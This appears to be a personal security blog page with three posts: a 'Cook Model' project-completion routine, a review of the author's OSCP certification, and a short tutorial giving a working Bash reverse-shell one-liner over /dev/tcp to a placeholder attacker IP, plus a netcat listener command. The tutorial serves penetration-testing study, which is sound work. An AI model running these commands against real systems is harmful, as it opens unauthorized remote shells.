Getting things done. The Cook Model

All of us have projects to be finished and many people do not continue their projects for different reasons. In this post I will talk about a routine usually I do follow to help me finishing my projects, I hope you find it useful.

I call this routine The Cook Model. this routine is simple yet effective, Just like any meal you want to prepare, you have to follow 3 phases in sequence to have an enjoyable meal.

1. Prepare:

This is the initial phase and the most important one I think. In this phase you are hungry and start preparing for the meal by buying the grocery, Reading preparing instructions and so on.

So does in projects, you got to have the reason why you want to start this project, why it’s important for you and what is the expected result.
Your strategy must be clear and defined, Please be honest with yourself and take in consideration all the hurdles you may face and what power or tools can help you.
Take as much time as you want in this phase to do your research, setting plan, buying tools/books, talking to people, looking for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and time frame.

2. Cook:

Cook your meal! Follow your agenda in phase 1 step by step. You can’t change your mind now in the middle of the cook by taking out the chicken of the grill and try to Fry it! You will ruin the whole meal.

This is the action time, you have to follow your agenda step by step and believe in the work you have done in phase 1.
You have to be patient and be persuasive, it’s a one way route and you can’t rethink about the plan or try to take a detour. This is where most people fail because they keep questioning their goal/plan and try to start all over again, and by that they start juggling around in hope to find a better settlement.
I can sum this phase in one word: “commitment”.

Result:

Now that you have done your job it’s time to taste the meal, is it salty? Need more time? Or just delicious ?

In this phase it’s not important if you success or fail, be proud of the effort you have done because you did reach the final destination. Some people do stuck in the previous phases and can’t reach this final phase so it will be an unfinished project for them and they can’t enjoy the result or evaluate the fail.
If you success then be happy and enjoy your achievement. If not then there is lessons to be learned from this experience and you can start all over again by modifying phase 1 and continue your project.

Fin:

You only need one person approval and this person is you. Take responsibility of your project and quit caring about other people opinions/experiences.
Most people do fail because they get stuck in infinite loop between phase 1 and 2 due to different reasons ( people opinions / self doubt / circumstances / etc ).
This is a one way route and you have to keep moving forward, don’t hesitate or settle for less.

OSCP Review

Intro:

I have been developing Software for years, However had a great chance to switch my career path to be in security field recently and that’s why I started looking for trainings to gain more skills.
Security for a software developer is writing a good code, running scanners, setting firewall, etc.
but there is still a missing link, how can hackers break into servers, what tools and techniques they use?

Enter OffSec:

In my journey for finding the right trainings, I reached OffSec since I was using Kali Linux as a platform to use scanners.
I was skeptical at first but after reading different reviews I decided to enroll in PWK course since I am a big fan of Linux and I need a training with a hands-on experience to know how hacking happens.

Materials:

Fast forward after registration, I received the e-mail package and start reading…
Well I have to say, this is indeed a 101 course but the topics covered is broad and wide.
OffSec will takes you in a journey to all hacking topics, you will know the How and the Why for each concept in a self-learning way.
as Morpheus said: “I’m trying to free your mind, Neo. But I can only show you the door. You’re the one that has to walk through it.”
I did spend two months reading the materials without rushing to know all the topics and connect the dots before hitting the lab, In the same time I did solve the exercises and skipped the ones required more engaging to do it later on.

Lab:

After finishing materials reading and taking summer vacation for one month, I was ready to hit the lab.
I have to say the Lab is just fantastic! I was overwhelmed and running around like a lost sheep in the first few days, but after that I start enumerating the whole lab network and start hacking the low-hanging fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty.

Exam:

after hitting 32 boxes, I felt ready to take the exam to test my skills.
my first attempt went bad and failed, the exam is BRUTAL but was an eye-opener and knew my weakness.
I did take multiple exam attempts and with each attempt I was gaining more and more skills, it’s a tough process but the aftermath of it is HUGE and learned/tuned a lot of things.
If you want to take the exam then you have to be 100% ready for it. 80% or 90% will not be enough, you have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile, it went smoothly and I was able to finish the exam along with writing the report in the 24 hours time slot.

Recommendations:

  • you have to change your mindset, in this course you have to think like a hacker or a breaker because developers expect the code to work in a certain way but the hacker will try to twist the code to get in.
  • study and research, you have to read a lot of information and test it to understand what is happening and why.
  • its simple, sometimes it’s plain simple to hack in and you do not have to go deep in the rabbit hole.
  • set a game-plan, know you target very will and spend time reading the enumeration data to set a proper game plan before start hacking Otherwise you will waste your resources.
  • practice, download images from Vulnhub.com and practice. Also I do find the walk-throughs a great way to learn from other people experience.

Final Toughs:

I do encourage anyone seriously interested in Information Security or Hacking to enroll in PWK course, the learning curve is high and you will learn a lot of things in a short amount of time.
you have to dedicate effort/time for this course, otherwise you can’t learn or pass the exam.
the community and OffSec people are great and you will learn many new things, Definitely I will enroll in other courses and try to engage more in the community.

References:

the below links did help me much when I was studying the course

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/

http://www.blackhillsinfosec.com/?p=4645

https://highon.coffee/blog/lfi-cheat-sheet/

http://netsec.ws/?p=331

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Bash Reverse Shell

In this post I will talk about a special type of reverse shell, I like this type of shell because mostly you can use tools already exist on your target.

But before start talking about Bash Reverse Shell in details, I would like to mention some limitations about this type of shell:

  • You can’t use this type of shell against Windows targets since bash is not there.
  • You can’t use this type of shell if the Unix-Like target do not have the Bash package installed. However you can use the ancient Bourne shell (sh).

Now All you have to do is to setup a nc listener on your attacking machine.

nc -nlvp PORT

Then Issue this command on your target.

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where :

  • ATTACKER-IP is your attacking machine IP address
  • ATTACKER-IP is port used by nc listener

And that’s ! you should have a bash reverse shell by now, This reverse shell was created thanks to Bash capabilities and Unix-Like File descriptor handler.

You can replace /bin/bash by /bin/sh if the target machine lack bash package.

Final Thoughts:

As always you have to enumerate your target to know the environment in front of you. In our case you have to check for Bash or Sh existence and located where.

this post serve as a short note on how to create a Bash reverse shell, please read more about the software or technology used in references.

Regards,

Fahad.


references: